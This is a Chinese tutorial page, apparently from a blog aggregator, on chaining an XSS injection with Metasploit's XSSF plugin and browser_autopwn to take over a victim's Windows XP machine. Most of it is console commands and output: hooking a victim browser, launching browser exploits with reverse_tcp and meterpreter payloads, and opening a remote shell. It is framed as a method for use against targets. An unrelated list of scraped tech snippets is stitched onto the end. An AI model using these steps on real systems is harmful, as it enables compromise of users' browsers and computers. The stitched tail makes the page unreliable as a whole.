obnus
obnus

测试xss如何获得目标机器系统权限

 author:RootkitHat.Org

有装B的嫌疑,但是你如何得知你的目标用什么系统和什么浏览器
相似的工具这里有一个:http://xss-proxy.sourceforge.net
附件: Parh /sploits/2011/06/XSSF.zip
解压后吧附件全部复制到 /msf3/里面
启动metasploit ,创建数据库,并且载入插件

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 335 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11089 updated 239 days ago (2010.11.22)

Warning: This copy of the Metasploit Framework was last updated 239 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_disconnect
msf > db_driver mysql
msf > db_connect root:[email protected]/xssftest
msf > load xssf

 __  __     ______     ______     ______
/\_\_\_\   /\  ___\   /\  ___\   /\  ___\
\/_/\_\/_  \ \___  \  \ \___  \  \ \  __\
  /\_\/\_\  \/\_____\  \/\_____\  \ \_\
  \/_/\/_/   \/_____/   \/_____/   \/_/     Cross-Site Scripting Framework
                                          Ludovic Courgnaud - CONIX Security

[+] Server started : http://192.168.56.101:8888/

[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF如果IP不是你外网IP请修改/opt/metasploit3/msf3/plugins/xssf.rb 吧0,0,0,0换成你的外网IP
然后让目标机xss “http://192.168.56.101:8888/loop”

 

查看xss会话

msf > xssf_victims

Victims
=======

id  xssf_server_id  active  ip            interval  browser_name       browser_version  cookie
--  --------------  ------  --            --------  ------------       ---------------  ------
1   1               true    192.168.56.1  2         Internet Explorer  6.0              YES

[*] Use xssf_information [VictimID] to see more information about a victimtrue 代表可以使用

链接xss会话

msf > xssf_information 1

INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS      : 192.168.56.1
ACTIVE          : TRUE
FIRST REQUEST   : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST    : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME    : Internet Explorer
BROWSER VERSION : 6.0
OS NAME         : Windows
OS VERSION      : XP
ARCHITECTURE    : ARCH_X86
LOCATION        : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
COOKIES ?       : YES
RUNNING ATTACK  : NONE如何取得系统权限:

使用METASPLOIT模块自动创建一些浏览器漏洞 注意端口不能和xssf插件端口相同

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...

[*] --- Done, found 16 exploit modules

[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.查看可以利用的漏洞

msf auxiliary(browser_autopwn) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Auxiliary: server/browser_autopwn
  1   Exploit: multi/browser/firefox_escape_retval
  2   Exploit: multi/browser/java_calendar_deserialize
  3   Exploit: multi/browser/java_trusted_chain
  4   Exploit: multi/browser/mozilla_compareto
  5   Exploit: multi/browser/mozilla_navigatorjava
  6   Exploit: multi/browser/opera_configoverwrite
  7   Exploit: multi/browser/opera_historysearch
  8   Exploit: osx/browser/safari_metadata_archive
  9   Exploit: windows/browser/apple_quicktime_marshaled_punk
  10  Exploit: windows/browser/apple_quicktime_rtsp
  11  Exploit: windows/browser/apple_quicktime_smil_debug
  12  Exploit: windows/browser/ie_createobject
  13  Exploit: windows/browser/ms03_020_ie_objecttype
  14  Exploit: windows/browser/ms10_018_ie_behaviors
  15  Exploit: windows/browser/ms10_xxx_ie_css_clip
  16  Exploit: windows/browser/winzip_fileview
  17  Exploit: multi/handler
  18  Exploit: multi/handler
  19  Exploit: multi/handler根据你目标的操作系统选择利用模块

xssf_exploit 1 12 第一个数字是xss会话 第二个数字是浏览器漏洞编号

msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...

[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)

^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Type                   Information                                 Connection
  --  ----                   -----------                                 ----------
  1   meterpreter x86/win32  DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB  192.168.56.101:3333 -> 192.168.56.1:37151

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\dis9team\桌面>完毕

你可能感兴趣的:(权限,职场,xss,休闲,系统权限)

  • uniapp [安卓苹果App端] - 详细实现下载文件保存到用户手机本地,指定文件存储位置路径及文件夹名称下载并保存,Uniapp app端将文件下载保存并储存到指定目录(手机系统存储空间权限检测) 王二红 +UniAppuni-app安卓Android苹果ios下载文件到指定目录位置如何将文件保存到用户手机上下载指定文件存储路径并提示信息解决app端真机下载报错失败
    前言网上的教程乱七八糟且兼容性太差,本文提供优质示例。在uni-appApp端(安卓APP|苹果APP)开发中,详解在app平台端实现下载文件到用户本机指定目录,检测并提示开启读写存储权限后执行保存文件功能,Uniapp下载文件并保存到本地解决方案,并且指定文件保存位置及文件夹名称,支持任意文件音视频/文档/图片等,下载成功或失败会有手机系统提示,提供详细示例代码。uniapp(v2|v3)版本项
  • android 根目录 写文件路径,android app文件目录结构 weixin_39593498 android根目录写文件路径
    转:https://blog.csdn.net/luoguopeng/article/details/72832567androidapp目录:SDCard/Android/data/你的应用的包名/原来,只要把文件写在这里的话,可以不用动态申请权限,只要在manifest里面声明权限就ok了;应用程序在运行的过程中如果需要向手机上保存数据,一般是把数据保存在SDcard中的。大部分应用是直接在S
  • android读写缓存文件路径,获取Android应用专属缓存存储目录的实例 落霜枫舞 android读写缓存文件路径
    如果你想摆脱缓存目录使用的尴尬:找不到目录?忘记申请读写权限?害怕污染用户存储空间?……请往下看SD卡缓存目录当应用需要将图片或者文件缓存到SD卡中时要去申请创建目录,有下面几种途径我们可以通过API调用应用专属目录:///storage/emulated/0/Android/data/app_package_name/files/PicturesContent.getExternalFilesD
  • Android 中临时文件存放路径选择 casual_clover 新起点android
    在Android中,下载临时文件通常可以放在以下目录中,具体选择取决于应用的需求和目标Android版本的限制:1.通用临时目录(/data/local/tmp/)这是Android系统提供的一个通用临时目录,适用于存储临时文件。特点:无需特殊权限:应用通常可以直接访问此目录,无需请求存储权限。适合临时文件:文件在设备重启后可能会被清理,适合存储临时数据。valtempFilePath="/dat
  • 深入浅出Spring AOP:面向切面编程的实战与解析 小码快撩 java开发语言spring
    导语SpringAOP(面向切面编程)作为Spring框架的核心特性之一,提供了强大的横切关注点处理能力,使得开发者能够更好地解耦系统架构,将非功能性需求(如日志记录、事务管理、权限控制等)从主业务逻辑中抽离出来,实现模块化的交叉关注点处理。本文将带你逐步探索SpringAOP的关键技术要点及其实战应用。一、AOP基础概念在SpringAOP中,有几个基础概念对于理解和使用AOP至关重要。以下是对
  • 严格把控K8S集群中的操作权限,为普通用户生成特定的kubeconfig文件 少儿频道 kubernetes容器云原生
    文章目录前言一、背景二、证书和证书签名请求(了解)1.证书签名请求2.请求签名流程3.Kubernetes签名者4.证书过期时间限制字段二、脚本示例2.检查集群上下文及csr3.切换集群上下文,检查权限4.普通用户操作总结前言使用并维护过K8S的ops/sre都知道,kubeconfig对于k8s的访问是非常重要。无论是部署,调试还是运维,都需要kubeconfig文件。在通过二进制或者kubea
  • TDE透明加密:免改造实现SQLServer数据库安全存储 安 当 加 密 sqlserver数据库
    引言:数据安全已成企业生命线在数字经济时代,SQLServer作为全球企业级数据库市场的核心引擎,承载着金融交易记录、医疗档案、智能制造数据等核心资产。然而,勒索软件攻击、内部泄密、备份泄露等威胁频发,仅2024年全球因数据库安全漏洞造成的损失已超320亿美元。传统防火墙与权限管理难以应对存储介质窃取、高权限滥用等风险,而安当TDE透明加密组件通过创新技术,为SQLServer数据库构建了从存储层
  • 克服 AI 时代的恐惧、不确定性和疑虑 人工智能
    1学习咋通过培养AI技能,提高职场对AI的积极性职场中抵触AI的现象确实存在。很多人并非不愿意接受变化,而是因为对AI存在“FUD”——即恐惧(Fear)、不确定性(Uncertainty)和疑虑(Doubt)。要在AI转型时代取得成功,必须积极应对这些FUD,并营造一种支持学习的文化,让员工能够适应和成长,最终推动整个组织共同进步。大厂们都始终在内部率先使用和测试自家的AI技术,然后才推向客户。
  • 《SQL应用场景解析:如何通过SQL解决实际业务问题》
    新手程序员如何用三个月成为SQL高手?万字自学指南带你弯道超车在数据为王的时代,掌握SQL已成为职场新人的必修课。你可能不知道,仅用三个月系统学习,一个零基础的小白就能完成从数据库萌新到SQL达人的蜕变。去年刚毕业的小王就是典型例子,通过本文的学习路线,他不仅成功转行数据分析师,薪资更是翻了两倍。本文将为你揭秘这条高效的学习路径,让你少走90%的弯路。[]()一、为什么每个职场新人都需要SQL这把
  • C语言 进阶指针学习笔记 flashier C语言学习记录c语言学习笔记
    文章目录字符指针指针数组数组指针数组名数组传参函数指针函数指针数组指向函数指针数组的指针回调函数Qsort的使用通过冒泡排序模拟实现qsort大部分的内容都写在代码注释中指针有类型,指针的类型决定了指针的±整数的步长,指针解引用操作的时候的权限字符指针#includeintmain(void){constchar*str1="Hello,World!";constchar*str2="Hello,
  • harmony OS NEXT-音频录制与播放模块 遇到困难睡大觉哈哈 音视频harmonyos华为鸿蒙
    HarmonyOS音频录制与播放模块1.模块功能概览麦克风权限动态检测与申请音频录制功能(支持参数配置)音频波形实时可视化(暂时未完善,先凑合看,后续会完善)录音文件播放功能2.权限检测流程1.代码实现asynccheckPermission(){constmanager=abilityAccessCtrl.createAtManager();//首次权限申请constresult=awaitma
  • NPM安装与配置全流程详解(2025最新版) ╰つ゛木槿 web前端npm前端node.js
    写目录一、环境准备与Node.js安装1.下载Node.js(含NPM)2.验证安装二、NPM核心配置优化1.全局模块与缓存路径设置2.镜像加速3.代理配置(企业网络适用)三、NPM基础操作指南1.项目初始化2.包管理命令3.依赖锁定与版本管理四、进阶配置与工具1.权限问题解决2.缓存清理3.替代工具推荐五、常见问题排查1.安装失败场景2.脚本执行权限(Windows)六、最佳实践建议一、环境准备
  • 2025最全 Java 面试八股文(持续更新) 关注我学java java面试开发语言
    Java面试Java面试随着时间的改变而改变。在过去的日子里,当你知道String和StringBuilder的区别就能让你直接进入第二轮面试,但是现在问题变得越来越高级,面试官问的问题也更深入。在我初入职场的时候,类似于Vector与Array的区别、HashMap与Hashtable的区别是最流行的问题,只需要记住它们,就能在面试中获得更好的机会,但这种情形已经不复存在。如今,你将会被问到许多
  • 从零开始搭建搜索推荐系统(五十四)多路召回之万剑归宗 hanyi_ 搜索推荐javajava搜索系统
    聊的不止技术。跟着小帅写代码,还原和技术大牛一对一真实对话,剖析真实项目筑成的一砖一瓦,了解最新最及时的资讯信息,还可以学到日常撩妹小技巧哦,让我们开始探索主人公小帅的职场生涯吧!(PS:本系列文章以幽默风趣风格为主,较真侠和杠精请绕道~)一、奶茶引发的血案(会议室里,行服小姐姐把笔记本往桌上一拍,屏幕上是密密麻麻的搜索日志)行服姐姐:"小帅!你自己看看!用户搜'朝阳区低糖芝士草莓冰沙',你家系统
  • 2024年最新【AcWing】蓝桥杯集训每日一题Day7 贡献法 4261,2024年最新2024春招面试 2401_84976300 程序员c语言c++学习
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!是一个数学思想,在枚举一些数的时候,有些枚举可能
  • 4年产品经理工作总结,这3个问题没想清楚一辈子都是初级产品(附AI产品经理福利) Langchain 产品经理人工智能语言模型langchain大模型LLMai产品经理
    笔者将这4年产品工作的所思,所悟,所得进行总结,总结起来就是3个方面:关于学习成长,关于交流分享,关于职场选择。希望分享的内容对产品新人们有所帮助,也希望能和产品老鸟们多多交流,毕竟讨论使人完备!本文金字塔结构如下图所示:一、关于学习成长产品经理这个职位有些类似于中国的博士入学考试,宽进严出,想要完成从产品专员->产品经理->高级产品经理->产品总监的升级之路可谓非常之难,抛开运气因素,对一个人的
  • harmonyOS(鸿蒙)— 网络权限(解决app网络资源无法加载,图片无法显示) chen.c. harmonyOS(鸿蒙)harmonyos华为
    harmonyOS系列harmonyOS(网络权限)一、问题梳理二、代码及图示一、问题梳理在鸿蒙app的开发里会有联网业务无法加载,图片无法显示的情况,多半是系统的网络权限没有申请,所以无法使用需要网络加载的资源,具体在项目的entry=>src=>main=>module.json5里面配置即可。二、代码及图示网络权限申请代码如果没有找到requestPermissions,则在extensio
  • 程序化交易的未来趋势:API技术将如何演进? 云策量化 程序化炒股Deepseek量化投资Python程序化交易PTradeQMT量化交易量化股票deepseek
    推荐阅读:《程序化炒股:如何申请官方交易接口权限?个人账户可以申请吗?》程序化交易的未来趋势:API技术将如何演进?引言程序化交易,也称为算法交易,是金融市场中使用计算机算法自动执行交易指令的一种方式。随着技术的不断进步,API(应用程序编程接口)在程序化交易中扮演着越来越重要的角色。本文将探讨API技术在程序化交易中的未来趋势,以及它们将如何演进以适应市场的需求。当前API技术在程序化交易中的应
  • 如何在宝塔mysql修改掉3306端口
    在使用宝塔面板管理MySQL数据库时,默认情况下,MySQL会使用3306端口。如果出于安全考虑或者其他用途,我们需要修改MySQL的端口号。本文将介绍如何在宝塔面板中修改MySQL的3306端口,并提供代码示例和流程图。操作步骤在开始之前,请确保您已经登录到宝塔面板,并且具备相关操作的权限。1.登录宝塔面板首先,您需要登录到您的宝塔面板。输入网址,输入用户名和密码进行登录。2.进入数据库管理在宝
  • 【云原生之Docker实战】使用Docker部署MongoDB数据库管理工具Mongo-Express 江湖有缘 docker云原生Mongo-Express
    【云原生之Docker实战】使用Docker部署MongoDB数据库管理工具Mongo-Express一、Mongo-Express介绍1.Mongo-Express简介2.MongoDB简介二、检查本地系统环境1.检查系统版本2.检查docker状态3.检查docker版本三、安装docker-compose1.下载docker-compose二进制包2.给文件增加执行权限3.检查docker-
  • 利用数据库实现软件刷卡登录与三级权限 浮生如梦_ 插件数据库oracle人机交互计算机视觉人工智能
    演示Demo用户管理界面一,什么是三级权限三级权限通常指在权限管理系统中,用户或角色被授予的中等级别访问权限。具体含义因系统或组织而异,但一般具备以下特点:1.访问范围读取权限:可查看大部分数据和文件。部分写入权限:能修改或添加部分数据,但受限。受限执行权限:可执行某些操作或命令,但受限制。2.适用场景中层管理人员:需要查看和部分修改数据,但无需最高权限。技术支持人员:需执行特定操作,但不应访问所
  • 【从零开始学习计算机科学】操作系统(七)文件管理 贫苦游商 学习服务器操作系统文件管理文件读写文件块文件操作
    【从零开始学习计算机科学】操作系统(七)文件管理文件管理文件的逻辑结构文件的读写方式文件的物理结构与组织文件目录空闲块管理文件的共享文件的权限控制与保护文件系统的其他功能文件管理文件管理主要涉及文件的逻辑组织和物理组织,目录的结构和管理。所谓文件管理,就是操作系统中实现文件统一管理的一组软件、被管理的文件以及为实施文件管理所需要的一些数据结构的总称(是操作系统中负责存取和管理文件信息的机构)从系统
  • OpenHarmony鸿蒙开发( Beta5.0)轻量型系统服务管理部件详解 让开,我要吃人了 HarmonyOS鸿蒙开发OpenHarmonyharmonyos华为前端鸿蒙移动开发驱动开发OpenHarmony
    系统服务框架基于面向服务的架构,提供了服务开发、服务的子功能开发、对外接口的开发、以及多服务共进程、进程间服务调用等开发能力。其中:M核:包含服务开发、服务的子功能开发、对外接口的开发以及多服务共进程的开发框架。A核:在M核能力基础之上,包含了进程间服务调用、进程间服务调用权限控制、进程间服务接口的开发等能力。开发跨进程间服务调用客户端代理定义IPC接口客户端代理:typedefstructDem
  • python笔记之常用命令总结 chenlang_lbs python笔记
    1、nautilus:打开当前工作目录2、wcfiles_names:查看文件的数量3、Pycharm的常用命令ctrl+r:查找命令4、[email protected]:获得进入nb@电脑的权限5、复制很长的数据的技巧:在数据前面点击+shift+在数据后面点击+(ctrl+c),完成复制
  • Zookeeper(102)如何在生产环境中设置Zookeeper的ACL? 辞暮尔尔-烟火年年 微服务zookeeperdebian分布式
    在生产环境中设置ZooKeeper的访问控制列表(ACL)是确保数据安全和访问控制的关键步骤。ACL允许你定义谁可以访问ZooKeeper节点以及他们可以执行的操作。以下是设置ZooKeeperACL的详细步骤和代码示例。ACL基础知识ZooKeeper支持以下几种权限:CREATE:允许创建子节点。READ:允许读取节点数据和获取子节点列表。WRITE:允许设置节点数据。DELETE:允许删除子
  • Ubuntu22.04安装数据 @-wyy mysql
    数据库安装步骤:sudoapt-getupdatesudoaptinstallmysql-servermysql-clientsudosystemctlstartmysqlsudosystemctlstatusmysql(1)在命令行登录MySQL数据库,并使用mysql数据库(必须使用这个库,因为root在这里面)sudomysql-uroot-pusemysql(2)修改连接权限,执行:upd
  • python远程连接mysql数据库_python远程连接MySQL数据库 weixin_39528697
    python远程连接MySQL数据库本文实例为大家分享了python远程连接MySQL数据库的具体代码,供大家参考,具体内容如下连接数据库这里默认大家都已经配置安装好MySQL和Python的MySQL模块,且默认大家的DB内表和访问账号权限均已设置无误,下面直接代码演示:#-*-coding:utf-8-*-"""CreatedonFriDec3010:43:352016@author:zhen
  • DeepSeek对于普通打工人来说有什么帮助呢? 人工智能
    在当今快速变化的社会中,普通打工人面临着越来越多的挑战:职场竞争加剧、技能更新换代加快、工作与生活的平衡难以掌控等。在这样的背景下,如何提升自身竞争力、找到适合自己的职业发展路径,成为了每个打工人都需要思考的问题。而DeepSeek,作为一款基于人工智能和大数据分析的职业发展工具,正在为普通打工人提供全新的解决方案。本文将从多个角度探讨DeepSeek对于普通打工人的帮助,分析它如何通过职业规划、
  • 前端 CDN 深度解析:从加速优化到工程化实践 斯~内克 前端前端
    一、前端CDN的核心价值与挑战1.1现代前端资源的分发困境资源体积爆炸:主流框架生产包平均大小突破2MB全球化访问需求:跨国访问延迟差异可达500ms以上版本管理复杂度:多环境部署导致的缓存污染问题安全防护压力:XSS、资源劫持等攻击频发1.2前端CDN的技术指标指标传统方案CDN优化后提升幅度首屏加载时间3.8s1.2s68%资源下载速度12MB/s85MB/s608%缓存命中率65%98%51
  • 目前一站式LIMS实验室系统在我国的应用情况 谱标LIMS实验室系统 LIMS实验室系统LIMS实验室系统LIMS系统实验室系统数据库大数据
    一站式LIMS实验室系统全称为实验室信息管理系统。它是计算机网络技术,数据库技术,数据通讯,信息管理等多学科集成的软件产品。优良的LIMS系统可以有效地实施质量保证和质量控制流程,让不同岗位的人员按各自的权限分享不同级别的信息资源,完成约定的工作。能及时发现测试、服务过程中的异常情况。可以自动进行信息反馈与记录跟踪,追本溯源。系统能对原始数据进行二次加工处理,提供各种统计数据,供高层管理人员分析决
  • PHP,安卓,UI,java,linux视频教程合集 cocos2d-x小菜 javaUIPHPandroidlinux
    ╔-----------------------------------╗┆                           
  • 各表中的列名必须唯一。在表 'dbo.XXX' 中多次指定了列名 'XXX'。 bozch .net.net mvc
    在.net mvc5中,在执行某一操作的时候,出现了如下错误:       各表中的列名必须唯一。在表 'dbo.XXX' 中多次指定了列名 'XXX'。 经查询当前的操作与错误内容无关,经过对错误信息的排查发现,事故出现在数据库迁移上。 回想过去: 在迁移之前已经对数据库进行了添加字段操作,再次进行迁移插入XXX字段的时候,就会提示如上错误。  &
  • Java 对象大小的计算 e200702084 java
                              Java对象的大小 如何计算一个对象的大小呢?    
  • Mybatis Spring 171815164 mybatis
    ApplicationContext ac = new ClassPathXmlApplicationContext("applicationContext.xml"); CustomerService userService = (CustomerService) ac.getBean("customerService"); Customer cust
  • JVM 不稳定参数 g21121 jvm
            -XX 参数被称为不稳定参数,之所以这么叫是因为此类参数的设置很容易引起JVM 性能上的差异,使JVM 存在极大的不稳定性。当然这是在非合理设置的前提下,如果此类参数设置合理讲大大提高JVM 的性能及稳定性。        可以说“不稳定参数”
  • 用户自动登录网站 永夜-极光 用户
    1.目标:实现用户登录后,再次登录就自动登录,无需用户名和密码 2.思路:将用户的信息保存为cookie            每次用户访问网站,通过filter拦截所有请求,在filter中读取所有的cookie,如果找到了保存登录信息的cookie,那么在cookie中读取登录信息,然后直接
  • centos7 安装后失去win7的引导记录 程序员是怎么炼成的 操作系统
    1.使用root身份(必须)打开 /boot/grub2/grub.cfg 2.找到 ### BEGIN /etc/grub.d/30_os-prober ###   在后面添加    menuentry "Windows 7 (loader) (on /dev/sda1)" { 
  • Oracle 10g 官方中文安装帮助文档以及Oracle官方中文教程文档下载 aijuans oracle
    Oracle 10g 官方中文安装帮助文档下载:http://download.csdn.net/tag/Oracle%E4%B8%AD%E6%96%87API%EF%BC%8COracle%E4%B8%AD%E6%96%87%E6%96%87%E6%A1%A3%EF%BC%8Coracle%E5%AD%A6%E4%B9%A0%E6%96%87%E6%A1%A3 Oracle 10g 官方中文教程
  • JavaEE开源快速开发平台G4Studio_V3.2发布了 無為子 AOPoraclemysqljavaeeG4Studio
      我非常高兴地宣布,今天我们最新的JavaEE开源快速开发平台G4Studio_V3.2版本已经正式发布。大家可以通过如下地址下载。   访问G4Studio网站 http://www.g4it.org   G4Studio_V3.2版本变更日志 功能新增 (1).新增了系统右下角滑出提示窗口功能。 (2).新增了文件资源的Zip压缩和解压缩
  • Oracle常用的单行函数应用技巧总结 百合不是茶 日期函数转换函数(核心)数字函数通用函数(核心)字符函数
    单行函数;   字符函数,数字函数,日期函数,转换函数(核心),通用函数(核心) 一:字符函数: .UPPER(字符串) 将字符串转为大写 .LOWER (字符串) 将字符串转为小写 .INITCAP(字符串) 将首字母大写 .LENGTH (字符串) 字符串的长度 .REPLACE(字符串,'A','_') 将字符串字符A转换成_
  • Mockito异常测试实例 bijian1013 java单元测试mockito
    Mockito异常测试实例: package com.bijian.study; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; import org.junit.Assert; import org.junit.Test; import org.mockito.
  • GA与量子恒道统计 Bill_chen JavaScript浏览器百度Google防火墙
    前一阵子,统计**网址时,Google Analytics(GA) 和量子恒道统计(也称量子统计),数据有较大的偏差,仔细找相关资料研究了下,总结如下:   为何GA和量子网站统计(量子统计前身为雅虎统计)结果不同? 首先:没有一种网站统计工具能保证百分之百的准确出现该问题可能有以下几个原因:(1)不同的统计分析系统的算法机制不同;(2)统计代码放置的位置和前后
  • 【Linux命令三】Top命令 bit1129 linux命令
    Linux的Top命令类似于Windows的任务管理器,可以查看当前系统的运行情况,包括CPU、内存的使用情况等。如下是一个Top命令的执行结果:     top - 21:22:04 up 1 day, 23:49, 1 user, load average: 1.10, 1.66, 1.99 Tasks: 202 total, 4 running, 198 sl
  • spring四种依赖注入方式 白糖_ spring
      平常的java开发中,程序员在某个类中需要依赖其它类的方法,则通常是new一个依赖类再调用类实例的方法,这种开发存在的问题是new的类实例不好统一管理,spring提出了依赖注入的思想,即依赖类不由程序员实例化,而是通过spring容器帮我们new指定实例并且将实例注入到需要该对象的类中。依赖注入的另一种说法是“控制反转”,通俗的理解是:平常我们new一个实例,这个实例的控制权是我
  • angular.injector boyitech AngularJSAngularJS API
    angular.injector   描述: 创建一个injector对象, 调用injector对象的方法可以获得angular的service, 或者用来做依赖注入.   使用方法: angular.injector(modules, [strictDi])   参数详解: Param Type Details mod
  • java-同步访问一个数组Integer[10],生产者不断地往数组放入整数1000,数组满时等待;消费者不断地将数组里面的数置零,数组空时等待 bylijinnan Integer
    public class PC { /** * 题目:生产者-消费者。 * 同步访问一个数组Integer[10],生产者不断地往数组放入整数1000,数组满时等待;消费者不断地将数组里面的数置零,数组空时等待。 */ private static final Integer[] val=new Integer[10]; private static
  • 使用Struts2.2.1配置 Chen.H apachespringWebxmlstruts
    Struts2.2.1 需要如下 jar包: commons-fileupload-1.2.1.jar commons-io-1.3.2.jar commons-logging-1.0.4.jar freemarker-2.3.16.jar javassist-3.7.ga.jar ognl-3.0.jar spring.jar struts2-core-2.2.1.jar struts2-sp
  • [职业与教育]青春之歌 comsci 教育
